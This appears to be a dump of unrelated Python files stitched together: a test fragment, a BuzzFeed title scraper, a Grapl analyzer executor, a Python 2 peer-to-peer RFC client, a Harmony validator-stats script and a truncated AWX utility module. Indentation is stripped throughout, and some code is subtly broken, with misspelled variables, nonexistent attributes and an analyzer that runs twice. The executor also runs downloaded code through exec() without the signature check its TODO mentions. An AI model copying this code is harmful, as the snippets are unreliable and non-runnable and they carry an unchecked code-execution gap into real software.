stderr = open(self.in_dir('stderr.txt'), 'r').read()
self.assertContained('argc: 4', stdout)
self.assertContained('argv[3]: --3', stdout)
self.assertContained('hello, world!', stdout)
self.assertContained('Testing ASCII characters: !"$%&\'()*+,-./:;<=>?@[\\]^_`{|}~', stdout)
self.assertContained('Testing char sequences: %20%21 ä', stdout)
self.assertContained('hello, error stream!', stderr)
|
scrape_buzzfeed.py
|
import grequests
import json
import multiprocessing
from tqdm import tqdm
import threading
from html import unescape
write_buffer = multiprocessing.Queue()
def writer_thread():
with open('buzzfeed_dataset.txt', 'a+') as out:
count = 0
s = write_buffer.get(block=True)
while s:
out.write(s + '\n')
count += 1
if not count % 1000:
out.flush()
print ('Scraped and added {} titles...'.format(count))
s = write_buffer.get()
t = threading.Thread(target=writer_thread)
t.daemon = True
t.start()
def scrape(http_response):
feed = json.loads(http_response.text)
for i in feed['big_stories']:
write_buffer.put(unescape(i['title']), block=True)
for i in feed['buzzes']:
write_buffer.put(unescape(i['title']), block=True)
n_workers = 10
n_pages = 1000
pool = multiprocessing.Pool(n_workers)
buzzfeed_scrape = grequests.imap([grequests.get('http://www.buzzfeed.com/api/v2/feeds/index?p={}'.format(p)) for p in range(4001,n_pages+4001)])
pool.map(scrape, buzzfeed_scrape)
print('Scraping done')
write_buffer.put(None)
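# Illustrative sketch only (never called above): a quick way to eyeball one feed
# page before a long scrape, reusing the same endpoint and assuming the same
# JSON shape ('big_stories' / 'buzzes' entries carrying a 'title') that the
# scrape() callback above relies on. The default page number is an arbitrary example.
def preview_feed_page(page=4001):
    url = 'http://www.buzzfeed.com/api/v2/feeds/index?p={}'.format(page)
    response = grequests.map([grequests.get(url)])[0]
    feed = json.loads(response.text)
    # Return just the titles so the assumed keys can be checked quickly.
    return [unescape(i['title']) for i in feed.get('big_stories', []) + feed.get('buzzes', [])]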
|
analyzer-executor.py
|
import base64
import hashlib
import json
import os
import traceback
from multiprocessing import Process, Pipe
from multiprocessing.connection import Connection
from multiprocessing.pool import ThreadPool
from typing import Any, Optional, Tuple
import boto3
import redis
from botocore.exceptions import ClientError
from grapl_analyzerlib.entities import SubgraphView, ProcessView, FileView
from grapl_analyzerlib.execution import ExecutionHit, ExecutionComplete, ExecutionFailed
from pydgraph import DgraphClientStub, DgraphClient
def parse_s3_event(event) -> str:
# Retrieve body of sns message
# Decode json body of sns message
print("event is {}".format(event))
msg = json.loads(event["body"])["Message"]
msg = json.loads(msg)
record = msg["Records"][0]
bucket = record["s3"]["bucket"]["name"]
key = record["s3"]["object"]["key"]
return download_s3_file(bucket, key)
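# Illustrative sketch only: parse_s3_event() above assumes an SQS record whose
# "body" is JSON with a "Message" field that is itself JSON holding a standard
# S3 "Records" list. The helper below builds such an envelope with placeholder
# bucket/key values (hypothetical names, useful only for local experimentation).
def _example_s3_event(bucket="example-bucket", key="example/key"):
    inner = {"Records": [{"s3": {"bucket": {"name": bucket}, "object": {"key": key}}}]}
    return {"body": json.dumps({"Message": json.dumps(inner)})}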
def download_s3_file(bucket, key) -> str:
s3 = boto3.resource("s3")
obj = s3.Object(bucket, key)
return obj.get()["Body"].read()
def execute_file(name: str, file: str, graph: SubgraphView, sender, msg_id):
alpha_names = os.environ["MG_ALPHAS"].split(",")
exec(file, globals())
try:
pool = ThreadPool(processes=64)
results = []
for node in graph.node_iter():
if not node.node.node_key:
print(f'missing key {vars(node.node.node)} type: {type(node.node)}')
continue
if check_msg_cache(file, node.node.node_key, msg_id):
print('cache hit - already processed')
continue
if check_hit_cache(name, node.node.node_key):
print('cache hit - already matched')
continue
def exec_analyzer(analyzer, node, sender):
try:
client_stubs = [DgraphClientStub(f"{a_name}:9080") for a_name in alpha_names]
client = DgraphClient(*client_stubs)
analyzer(client, node, sender)
return node
except Exception as e:
print(traceback.format_exc())
print(f'Execution of {name} failed with {e} {e.args}')
sender.send(ExecutionFailed())
raise
exec_analyzer(analyzer, node, sender)
t = pool.apply_async(exec_analyzer, (analyzer, node, sender))
results.append(t)
pool.close()
for result in results:
node = result.get()
update_msg_cache(file, node.node.node_key, msg_id)
sender.send(ExecutionComplete())
except Exception as e:
print(traceback.format_exc())
print(f'Execution of {name} failed with {e} {e.args}')
sender.send(ExecutionFailed())
raise
def emit_event(event: ExecutionHit) -> None:
print("emitting event")
event_s = json.dumps(
{
"nodes": json.loads(event.nodes),
"edges": json.loads(event.edges),
"analyzer_name": event.analyzer_name,
"risk_score": event.risk_score,
}
)
event_hash = hashlib.sha256(event_s.encode())
key = base64.urlsafe_b64encode(event_hash.digest()).decode("utf-8")
s3 = boto3.resource("s3")
obj = s3.Object("grapl-analyzer-matched-subgraphs-bucket", key)
obj.put(Body=event_s)
# try:
# obj.load()
# except ClientError as e:
# if e.response['Error']['Code'] == "404":
# else:
# raise
MESSAGECACHE_ADDR = os.environ['MESSAGECACHE_ADDR']
MESSAGECACHE_PORT = os.environ['MESSAGECACHE_PORT']
message_cache = redis.Redis(host=MESSAGECACHE_ADDR, port=MESSAGECACHE_PORT, db=0)
HITCACHE_ADDR = os.environ['HITCACHE_ADDR']
HITCACHE_PORT = os.environ['HITCACHE_PORT']
hit_cache = redis.Redis(host=HITCACHE_ADDR, port=HITCACHE_PORT, db=0)
def check_msg_cache(file: str, node_key: str, msg_id: str) -> bool:
to_hash = str(file) + str(node_key) + str(msg_id)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
return bool(message_cache.get(event_hash))
def update_msg_cache(file: str, node_key: str, msg_id: str):
to_hash = str(file) + str(node_key) + str(msg_id)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
message_cache.set(event_hash, "1")
def check_hit_cache(file: str, node_key: str) -> bool:
to_hash = str(file) + str(node_key)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
return bool(hit_cache.get(event_hash))
def update_hit_cache(file: str, node_key: str):
to_hash = str(file) + str(node_key)
event_hash = hashlib.sha256(to_hash.encode()).hexdigest()
hit_cache.set(event_hash, "1")
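# Illustrative sketch only: how the two Redis-backed caches above are meant to
# work together. This mirrors the checks done in execute_file() and the updates
# done in lambda_handler(); the arguments are placeholders, and the real code
# performs these steps inline rather than calling a helper like this.
def _dedupe_sketch(file, node_key, msg_id, analyzer_name):
    if check_msg_cache(file, node_key, msg_id):
        return 'skip: this message already processed this node'
    if check_hit_cache(analyzer_name, node_key):
        return 'skip: this analyzer already matched this node'
    # ... run the analyzer here; after a hit, record both facts so reruns are cheap:
    update_msg_cache(file, node_key, msg_id)
    update_hit_cache(analyzer_name, node_key)
    return 'processed'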
def lambda_handler(events: Any, context: Any) -> None:
# Parse sns message
print("handling")
print(events)
print(context)
alpha_names = os.environ["MG_ALPHAS"].split(",")
client_stubs = [DgraphClientStub("{}:9080".format(name)) for name in alpha_names]
client = DgraphClient(*client_stubs)
for event in events["Records"]:
data = parse_s3_event(event)
message = json.loads(data)
# TODO: Use env variable for s3 bucket
print(f'Executing Analyzer: {message["key"]}')
analyzer = download_s3_file(f"{os.environ['BUCKET_PREFIX']}-analyzers-bucket", message["key"])
analyzer_name = message["key"].split("/")[-2]
subgraph = SubgraphView.from_proto(client, bytes(message["subgraph"]))
# TODO: Validate signature of S3 file
rx, tx = Pipe(duplex=False) # type: Tuple[Connection, Connection]
p = Process(target=execute_file, args=(analyzer_name, analyzer, subgraph, tx, event['messageId']))
p.start()
t = 0
while True:
p_res = rx.poll(timeout=5)
if not p_res:
t += 1
print(f"Polled {analyzer_name} for {t * 5} seconds without result")
continue
result = rx.recv() # type: Optional[Any]
if isinstance(result, ExecutionComplete):
print("execution complete")
break
# emit any hits to an S3 bucket
if isinstance(result, ExecutionHit):
print(f"emitting event for {analyzer_name} {result.root_node_key}")
emit_event(result)
update_msg_cache(analyzer, result.root_node_key, message['key'])
update_hit_cache(analyzer_name, result.root_node_key)
assert not isinstance(
result, ExecutionFailed
), f"Analyzer {analyzer_name} failed."
p.join()
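# Illustrative sketch only: lambda_handler() above waits on the receive end of a
# multiprocessing Pipe while execute_file() runs in a child Process and sends
# ExecutionHit / ExecutionComplete / ExecutionFailed objects back. The
# stripped-down version below shows just that hand-off with a trivial child;
# it is not part of the Lambda's execution path.
def _trivial_child(sender):
    sender.send(ExecutionComplete())  # the real child sends any hits before completing
def _pipe_protocol_sketch():
    rx, tx = Pipe(duplex=False)
    p = Process(target=_trivial_child, args=(tx,))
    p.start()
    while not rx.poll(timeout=5):
        pass  # lambda_handler() logs the wait and keeps polling here
    result = rx.recv()
    p.join()
    return isinstance(result, ExecutionComplete)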
|
RFCIndex.py
|
import socket
import threading
import os
import platform
import time
ReqRFC_list = []
SERVER_NAME = ''
SERVER_PORT = 0
HOST = socket.gethostbyname(socket.gethostname())
LISTENING_PORT = 40000
OS = platform.system()
FilePath = ''
Cookieval = ''
class Peer_entry:
def __init__(self,hostname,cookie,actflag,ttl,port,actvcnt,recentlyactv,next_entry=None):
self.hostname = hostname
self.cookie = cookie
self.actflag = actflag
self.TTL = int(ttl)
self.list_port = int(port)
self.ActvCnt = int(actvcnt)
self.RecentlyActv = recentlyactv
self.next_entry = next_entry
def get_next(self):
return self.next_entry
def get_hostname(self):
return self.hostname
def get_cookie(self):
return self.cookie
def get_actflag(self):
return self.actflag
def get_TTL(self):
return self.TTL
def get_list_port(self):
return self.list_port
def get_ActvCnt(self):
return self.ActvCnt
def get_RecentlyActv(self):
return self.RecentlyActv
def set_next(self,new_next):
self.next_entry = new_next
def set_hostname(self,hostname):
self.hostname = hostname
def set_list_port(self,port):
self.list_port = port
def set_cookie(self,CookieNo):
self.cookie = CookieNo
def set_actflag(self,actflag):
self.actflag = actflag
def set_TTL(self,ttl):
self.TTL = ttl
    def set_ActvCnt(self,actvcnt):
        self.ActvCnt = actvcnt
    def set_RecentlyActv(self,recentlyactv):
        self.RecentlyActv = recentlyactv
class Peer_Index():
def __init__(self,head=None):
self.head = head
def get_head(self):
return self.head
def set_head(self,head):
self.head = head
def CreateEntry(self,hostname,cookie,actflag,ttl,port,actvcnt,recentlyactv):
new_entry = Peer_entry(hostname,cookie,actflag,ttl,port,actvcnt,recentlyactv)
new_entry.set_next(self.head)
self.head = new_entry
def GetPort(self,hostname):
current = self.head
while current != None:
if current.hostname == hostname:
return current.get_list_port()
current = current.get_next()
print "ERROR! No Port found for %s\n" %(hostname)
def Display(self):
        current = self.head
print "Hostname\tCookie\tActive Flag\tTTL\tListening Port\tRegistration count\tRecent Registration time\n"
while current != None:
print "%s\t%s\t%s\t%d\t%d\t\t%d\t\t%s" %(current.hostname,current.cookie,current.actflag,current.TTL,current.list_port,current.actvcnt,current.recentlyactv)
current = current.next_entry
class RFC_Entry():
def __init__(self,RFCno=0,RFCtitle='',hostname=socket.gethostbyname(socket.gethostname()),ttl=7200,next_entry=None):
self.RFCno = int(RFCno)
self.RFCtitle = str(RFCtitle)
self.hostname = str(hostname)
self.TTL = int(ttl)
self.next_entry = next_entry
def get_next(self):
return self.next_entry
def get_RFCno(self):
return self.RFCno
def get_RFCtitle(self):
return self.RFCtitle
def get_hostname(self):
return self.hostname
def get_TTL(self):
return self.TTL
def set_next(self,new_next):
self.next_entry = new_next
def set_ttl(self,ttl):
self.TTL = ttl
class RFC_Index():
def __init__(self,head=None):
self.head = head
def get_head(self):
return self.head
    def CreateEntry(self,RFCno,RFCtitle,hostname,ttl):
        new_entry = RFC_Entry(RFCno,RFCtitle,hostname,ttl)
        if self.head == None:
            self.head = new_entry
            return
        current = self.head
        while current.next_entry != None:
            current = current.next_entry
        current.next_entry = new_entry
def LocalRFC_Search(self,RFCno): #Create required RFC list
current = self.head #Create socket to RS if not present
while current != None:
if current.hostname == HOST:
if current.RFCno == RFCno:
print "RFC %d is already present on the system\n" %(RFCno)
return True
current = current.next_entry
print "Contacting RS server for obtaining RFC %d......\n" %(RFCno)
return False
def Check_DuplicateEntry(self,RFCno,hostname): #Check for duplicate entry before appending peer RFC Index to local Index
current = self.head
while current != None:
if current.RFCno == RFCno and current.hostname == hostname:
return True
else:
current = current.next_entry
return False
def SearchRFC_Index(self,RFCno): #Search for required RFC in final RFC Index
current = self.head #Search each peer's RFC list
        status = False
print "Searching Merged RFC-Index....\n"
while current != None:
if current.hostname != HOST:
if current.RFCno == RFCno:
status = True
return (status,current.hostname)
current = current.next_entry
print " RFC %d is not found !\n"
return (status,None)
#def UpdateRFC_List(): #Update RFC Index and local file list
def GenerateIndex_Response(self):
global HOST
global OS
current = self.head
message = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
while current != None:
data = str(current.get_RFCno())+'(%^&***)'+str(current.get_RFCtitle())+'(%^&***)'+str(current.get_hostname())+'(%^&***)'+str(current.get_TTL())
message = message +"(%^&***)"+data
print "...\n"
current = current.next_entry
return message
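# Illustrative sketch only: every P2P-DI message in this file is a flat string of
# fields joined with the '(%^&***)' delimiter. The two helpers below just make
# that convention explicit; the surrounding code builds and splits messages
# inline instead of calling them.
DELIM = '(%^&***)'
def build_message(*fields):
    return DELIM.join(str(f) for f in fields)
def parse_message(raw):
    return raw.split(DELIM)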
def Get_LocalFile_List(): #Create entries for local files
global FilePath #Write local file list to a file
files = []
for file in os.listdir(FilePath):
if file.endswith(".txt"):
files.append(os.path.splitext(file)[0])
return files
def ServerMain(csocket,addr,object):
global FilePath
global HOST
global OS
msg = csocket.recv(1024)
message = str.split(msg,"(%^&***)")
if message[0] == 'GET':
if message[1] == 'RFC-INDEX':
response = object.GenerateIndex_Response()
print "Sending RFC-INDEX to %s.....\n" %(str(addr))
csocket.send(response)
print "Finished sending RFC-Index to %s\n" %(str(addr))
elif message[1] == 'RFC':
os.chdir(FilePath) #Changes CWD to 'CWD\IP_Project'
print "Sending RFC %s to %s......\n" %(message[2],str(addr))
response = "P2P-DI/1.0(%^&***)200(%^&***)OK(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
#socket.send(response)
filename = str(message[2])+".txt"
if os.path.isfile(filename):
with open(filename,"r") as f:
#response = f.read(1024)
#socket.send(response)
#while response != "":
filedata = f.read()
response = response +"(%^&***)"+filedata
csocket.send(response)
print "Finished sending RFC %s to %s\n" %(message[2],str(addr))
csocket.close()
def ServerModule(object):
server_socket = socket.socket()
server_socket.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
server_socket.bind((HOST,LISTENING_PORT))
server_socket.listen(25)
while True:
client_socket,addr = server_socket.accept()
print "Connection from: " + str(addr)
        MainThread = threading.Thread(target=ServerMain,args=(client_socket,addr,object))
MainThread.start()
def Generate_KeepAlive():
global SERVER_NAME
global SERVER_PORT
global HOST
global OS
global Cookieval
KAsock = socket.socket()
KAsock.connect((SERVER_NAME,SERVER_PORT))
while True:
time.sleep(300)
message = "KEEPALIVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookieval+"(%^&***)OS:(%^&***)"+OS
KAsock.send(message)
KAsock.close()
#def ClientModule():
def main():
global SERVER_NAME
global SERVER_PORT
global HOST
global LISTENING_PORT
global OS
global ReqRFC_list
global FilePath
global Cookieval
wd = os.getcwd()
if OS == "Windows":
directory = wd+"\IP_Project"
else:
directory = wd+"/IP_Project"
if not os.path.exists(directory):
os.makedirs(directory)
FilePath = directory
os.chdir(FilePath)
RFCtable = RFC_Index()
Peertable = Peer_Index()
print "Hello"
#MainThread = threading.Thread(target=ServerModule(),args=(RFCtable))
#MainThread.start()
print "Hello again"
SERVER_NAME = '127.0.0.1'
SERVER_PORT = 65423
Cookieval = None
s = socket.socket()
s.connect((SERVER_NAME,SERVER_PORT))
print "SERVER CONNECT"
if os.path.isfile("Cookie.txt"):
with open("Cookie.txt","r") as f:
Cookieval = f.read()
else:
Cookieval = None
if Cookieval != None:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookeival+"(%^&***)Port:(%^&***)"+str(LISTENING_PORT)+"(%^&***)OS:(%^&***)"+OS
else:
message = "REGISTER(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Port:(%^&***)"+str(LISTENING_PORT)+"(%^&***)OS:(%^&***)"+OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Peer %s registered with RS\n" %(str(s.getsockname()))
Cookieval = str(reply[4])
f = open("Cookie.txt","w+")
f.write(Cookieval)
f.close()
s.close()
    Keep_AliveThread = threading.Thread(target=Generate_KeepAlive,args=())
Keep_AliveThread.start()
localfiles = Get_LocalFile_List()
if not localfiles:
print "No RFCs on localhost\n"
else:
print "Updating local RFCs to RFC-Index..\n"
for files in localfiles:
RFCtable.CreateEntry(files,'',HOST,7200)
    start_time_cumulative = time.time()
for RFCno in ReqRFC_list:
status = RFCtable.LocalRFC_Search(RFCno)
if status == False:
start_time_each = time.time()
s = socket.socket()
s.connect((SERVER_NAME,SERVER_PORT))
message = "GET(%^&***)PEER-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookieval+"(%^&***)OS:(%^&***)"+OS
print "Requesting Peer-Index from RS....\n"
s.send(message)
rep = s.recv(4096)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
Peertable.set_head(None) # To CHECK!!
idx = 7
while (idx < len(reply)):
Peertable.CreateEntry(reply[idx],reply[idx+1],reply[idx+2],reply[idx+3],reply[idx+4],reply[idx+5],reply[idx+6])
idx = idx + 7
print "...\n"
print "Peer-Index successfully downloaded on %s" %(str(s.getsockname()))
s.close()
current = Peertable.get_head()
while current != None:
if current.hostname != HOST:
peername = current.get_hostname()
peerport = current.get_list_port()
s = socket.socket()
s.connect((peername,peerport))
message = "GET(%^&***)RFC-INDEX(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
print "Requesting RFC-Index from Peer %s:%s....\n" %(peername,str(peerport))
s.send(message)
rep = s.recv(4096)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
while (idx < len(reply)):
res = RFCtable.Check_DuplicateEntry(reply[idx],reply[idx+2])
if res == False:
RFCtable.CreateEntry(reply[idx],reply[idx+1],reply[idx+2],reply[idx+3])
idx = idx + 4
print "...\n"
print "RFC-Index successfully downloaded on %s\n" %(str(s.getsockname()))
else:
print "ERROR while downloading RFC-Index from peer %s:%s\n" %(peername,str(peerport))
s.close()
                    (status,peername) = RFCtable.SearchRFC_Index(RFCno)
if status == True:
peerport = Peertable.GetPort(peername)
s = socket.socket()
s.connect((peername,peerport))
message = "GET(%^&***)RFC(%^&***)"+RFCno+"(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)OS:(%^&***)"+OS
print "Requesting RFC %d from peer %s:%s..\n" %(RFCno,peername,str(peerport))
s.send(message)
rep = s.recv(4096)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
idx = 7
filename = str(RFCno)+".txt"
f = open(filename,"w+")
f.write(reply[7])
f.close()
end_time_each = time.time()
print "RFC %d successfully downloaded!\n" %(RFCno)
s.close()
break
s.close()
final_time_each = end_time_each - start_time_each
f = open("Timer.txt","a+")
try:
f.write("\nThe time taken for obtaining RFC "+str(RFCno)+": "+str(final_time_each))
finally:
f.close()
current = current.get_next()
if current == None:
print "RFC %d is not present with any peer\n" %(RFCno)
end_time_cumulative = time.time()
final_time_cumulative = end_time_cumulative - start_time_cumulative
f = open("Timer.txt","a+")
try:
f.write("\nThe cumulative time taken for obtaining all required RFCs: "+str(final_time_cumulative))
finally:
f.close()
print "Completed searching for all required RFCs\n"
s = socket.socket()
s.connect((SERVER_NAME,SERVER_PORT))
message = "LEAVE(%^&***)P2P-DI/1.0(%^&***)Host:(%^&***)"+HOST+"(%^&***)Cookie:(%^&***)"+Cookieval+"(%^&***)OS:(%^&***)"+OS
s.send(message)
rep = s.recv(1024)
reply = str.split(rep,"(%^&***)")
if reply[1] == "200" and reply[2] == "OK":
print "Leaving the peer network...BYE :("
s.close()
if __name__ == '__main__':
main()
|
validator_stats.py
|
#!/usr/bin/env python3
# Usage: python3 validator_stats.py
import csv
import json
import argparse
import requests
import re
from collections import defaultdict
from queue import Queue
from threading import Thread
csv_link = 'https://docs.google.com/spreadsheets/d/e/2PACX-1vTUUOCAuSgP8TcA1xWY5AbxaMO7OSowYgdvaHpeMQudAZkHkJrf2sGE6TZ0hIbcy20qpZHmlC8HhCw1/pub?gid=0&single=true&output=csv'
encoding = 'utf-8'
groups = ['team', 'p-ops', 'foundational nodes', 'p-volunteer', 'hackers', 'community', 'partners', 'ankr']
headers = {'Content-Type': 'application/json'}
def get_all_validators(endpoint) -> list:
v_print("-- hmy_getAllValidatorAddresses --")
payload = {"id": "1", "jsonrpc": "2.0",
"method": "hmy_getAllValidatorAddresses",
"params": []}
r = requests.request('POST', endpoint, headers = headers, data = json.dumps(payload), timeout = 30)
return json.loads(r.content)['result']
def get_all_keys(endpoint) -> dict:
v_print("-- hmy_getSuperCommittees --")
payload = {"id": "1", "jsonrpc": "2.0",
"method": "hmy_getSuperCommittees",
"params": []}
r = requests.request('POST', endpoint, headers = headers, data = json.dumps(payload), timeout = 30)
return json.loads(r.content)['result']
def read_csv(csv_file) -> (dict, list, list):
v_print("-- Processing CSV --")
r = requests.get(csv_file)
s = [x.decode(encoding) for x in r.content.splitlines()]
d = defaultdict(list)
v = []
dup_list = []
for line in csv.reader(s):
group = line[1].strip()
email = line[3].strip()
address = line[7].strip()
if group in groups and re.match('one1', address) != None:
if re.search('/[0-9]+$', email) != None or re.search('www.ankr.com', email) != None:
v_print("Skipping: %s" % address)
dup_list.append(address)
else:
v_print("Adding: %s" % address)
d[group].append(address)
v.append(address)
return d, v, dup_list
def get_validator_information(endpoint, validators) -> dict:
v_print("-- hmy_getValidatorInformation --")
validator_information = {}
def collect_validator_information(validator, endpoint, q):
payload = {"id": "1", "jsonrpc": "2.0",
"method": "hmy_getValidatorInformation",
"params": [validator]}
r = requests.request('POST', endpoint, headers = headers, data = json.dumps(payload), timeout = 30)
try:
q.put((validator, json.loads(r.content)['result']))
except Exception:
    q.put((validator, None))
threads = []
q = Queue(maxsize = 0)
for v in validators:
v_print("Address: %s" % v)
threads.append(Thread(target = collect_validator_information, args = (v, endpoint, q)))
batch = []
for t in threads:
batch.append(t)
t.start()
if len(batch) == 10:
for b in batch:
b.join()
batch = []
for b in batch:
b.join()
while not q.empty():
val, out = q.get()
validator_information[val] = out
return validator_information
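# Editor's note: a minimal, hypothetical sketch of driving the batched lookup
# above (addresses and endpoint are made up, and v_print is only defined once
# the __main__ block below runs). Requests are issued in batches of 10 threads.
def _example_batched_lookup(endpoint='https://api.s0.os.hmny.io'):
    sample = ['one1exampleaddr0', 'one1exampleaddr1']      # hypothetical validator addresses
    info = get_validator_information(endpoint, sample)
    # Failed RPC calls are recorded as None rather than raising.
    return {addr: info[addr] is not None for addr in sample}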
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--endpoint', default = 'https://api.s0.os.hmny.io', help = 'Network endpoint')
parser.add_argument('--csv_link', default = csv_link, help = 'File to read for groups & addresses')
parser.add_argument('--verbose', default = False, action = 'store_true', help = 'Verbose print for debug')
args = parser.parse_args()
if args.verbose:
def v_print(s):
print(s)
else:
def v_print(s):
return
network_validators = get_all_validators(args.endpoint)
committee = get_all_keys(args.endpoint)
by_group, csv_validators, extra_validators = read_csv(args.csv_link)
new_validators = [x for x in network_validators if x not in csv_validators and x not in extra_validators]
validator_information = get_validator_information(args.endpoint, network_validators)
v_print("-- Processing data --")
external_bls_keys = []
for x in committee['current']['quorum-deciders'].keys():
for y in committee['current']['quorum-deciders'][x]['committee-members']:
if not y['is-harmony-slot']:
external_bls_keys.append(y['bls-public-key'])
elected_validators = [v for v in network_validators if validator_information[v] and validator_information[v]['currently-in-committee']]
eligible_validators = [v for v in network_validators if validator_information[v] and validator_information[v]['epos-status'] == 'eligible to be elected next epoch']
not_eligible_validators = [v for v in network_validators if validator_information[v] and validator_information[v]['epos-status'] == 'not eligible to be elected next epoch']
earned_validators = [v for v in network_validators if validator_information[v] and validator_information[v]['lifetime']['reward-accumulated'] > 0]
per_group_earning_validators = defaultdict(list)
per_group_created_validators = defaultdict(list)
per_group_elected_validators = defaultdict(list)
for g in by_group.keys():
for v in by_group[g]:
if v in validator_information.keys():
per_group_created_validators[g].append(v)
if validator_information[v]['lifetime']['reward-accumulated'] > 0:
per_group_earning_validators[g].append(v)
if validator_information[v]['currently-in-committee']:
per_group_elected_validators[g].append(v)
print("-- Total Validator Stats --")
print("Total created validators: %d" % len(network_validators))
print("Validators that have earned rewards: %d" % len(earned_validators))
print("Elected validators: %d" % len(elected_validators))
print("Eligible validators: %d" % len(eligible_validators))
print("Not eligible validators: %d" % len(not_eligible_validators))
print("Current keys in committee: %d" % len(external_bls_keys))
print()
print("-- Created Validators Per Group --")
total_csv_created_validators = 0
for g in per_group_created_validators.keys():
c = len(per_group_created_validators[g])
print("Group: %-20s Number: %d" % (g, c))
total_csv_created_validators += c
print("Total: %d" % total_csv_created_validators)
print()
print("-- Earned Validators Per Group --")
total_csv_earned_validators = 0
for g in per_group_earning_validators.keys():
c = len(per_group_earning_validators[g])
print("Group: %-20s Number: %d" % (g, c))
total_csv_earned_validators += c
print("Total: %d" % total_csv_earned_validators)
print()
print("-- Elected Validators Per Group")
total_csv_elected_validators = 0
for g in per_group_elected_validators.keys():
c = len(per_group_elected_validators[g])
print("Group: %-20s Number: %d" % (g, c))
total_csv_elected_validators += c
print("Total: %d" % total_csv_elected_validators)
print()
print("-- New Validators --")
print("New Validators: %d" % len(new_validators))
for n in new_validators:
print("Address: %s, Validator Name: %s, Security Contact: %s, Website: %s" % (n, validator_information[n]['validator']['name'], validator_information[n]['validator']['security-contact'], validator_information[n]['validator']['website']))
|
common.py
|
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
import json
import yaml
import logging
import os
import re
import subprocess
import stat
import urllib.parse
import threading
import contextlib
import tempfile
import psutil
from functools import reduce, wraps
from decimal import Decimal
# Django
from django.core.exceptions import ObjectDoesNotExist, FieldDoesNotExist
from django.utils.translation import ugettext_lazy as _
from django.utils.functional import cached_property
from django.db.models.fields.related import ForeignObjectRel, ManyToManyField
from django.db.models.fields.related_descriptors import (
ForwardManyToOneDescriptor,
ManyToManyDescriptor
)
from django.db.models.query import QuerySet
from django.db.models import Q
# Django REST Framework
from rest_framework.exceptions import ParseError
from django.utils.encoding import smart_str
from django.utils.text import slugify
from django.apps import apps
logger = logging.getLogger('awx.main.utils')
__all__ = ['get_object_or_400', 'camelcase_to_underscore', 'underscore_to_camelcase', 'memoize', 'memoize_delete',
'get_ansible_version', 'get_ssh_version', 'get_licenser', 'get_awx_version', 'update_scm_url',
'get_type_for_model', 'get_model_for_type', 'copy_model_by_class', 'region_sorting',
'copy_m2m_relationships', 'prefetch_page_capabilities', 'to_python_boolean',
'ignore_inventory_computed_fields', 'ignore_inventory_group_removal',
'_inventory_updates', 'get_pk_from_dict', 'getattrd', 'getattr_dne', 'NoDefaultProvided',
'get_current_apps', 'set_current_apps',
'extract_ansible_vars', 'get_search_fields', 'get_system_task_capacity', 'get_cpu_capacity', 'get_mem_capacity',
'wrap_args_with_proot', 'build_proot_temp_dir', 'check_proot_installed', 'model_to_dict',
'NullablePromptPseudoField', 'model_instance_diff', 'parse_yaml_or_json', 'RequireDebugTrueOrTest',
'has_model_field_prefetched', 'set_environ', 'IllegalArgumentError', 'get_custom_venv_choices', 'get_external_account',
'task_manager_bulk_reschedule', 'schedule_task_manager', 'classproperty', 'create_temporary_fifo']
def get_object_or_400(klass, *args, **kwargs):
'''
Return a single object from the given model or queryset based on the query
params, otherwise raise an exception that will return in a 400 response.
'''
from django.shortcuts import _get_queryset
queryset = _get_queryset(klass)
try:
return queryset.get(*args, **kwargs)
except queryset.model.DoesNotExist as e:
raise ParseError(*e.args)
except queryset.model.MultipleObjectsReturned as e:
raise ParseError(*e.args)
def to_python_boolean(value, allow_none=False):
value = str(value)
if value.lower() in ('true', '1', 't'):
return True
elif value.lower() in ('false', '0', 'f'):
return False
elif allow_none and value.lower() in ('none', 'null'):
return None
else:
raise ValueError(_(u'Unable to convert "%s" to boolean') % value)
def region_sorting(region):
# python3's removal of sorted(cmp=...) is _stupid_
if region[1].lower() == 'all':
return ''
elif region[1].lower().startswith('us'):
return region[1]
return 'ZZZ' + str(region[1])
def camelcase_to_underscore(s):
'''
Convert CamelCase names to lowercase_with_underscore.
'''
s = re.sub(r'(((?<=[a-z])[A-Z])|([A-Z](?![A-Z]|$)))', '_\\1', s)
return s.lower().strip('_')
def underscore_to_camelcase(s):
'''
Convert lowercase_with_underscore names to CamelCase.
'''
return ''.join(x.capitalize() or '_' for x in s.split('_'))
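# Editor's note: quick, illustrative round-trip of the two converters above
# (a sketch only; the names are arbitrary and nothing runs at import time).
def _example_case_converters():
    assert camelcase_to_underscore('JobTemplate') == 'job_template'
    assert camelcase_to_underscore('HTTPResponseCode') == 'http_response_code'
    assert underscore_to_camelcase('job_template') == 'JobTemplate'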
class RequireDebugTrueOrTest(logging.Filter):
'''
Logging filter to output when in DEBUG mode or running tests.
'''
def filter(self, record):
from django.conf import settings
return settings.DEBUG or settings.IS_TESTING()
class IllegalArgumentError(ValueError):
pass
def get_memoize_cache():
from django.core.cache import cache
return cache
def memoize(ttl=60, cache_key=None, track_function=False, cache=None):
'''
Decorator to wrap a function and cache its result.
'''
if cache_key and track_function:
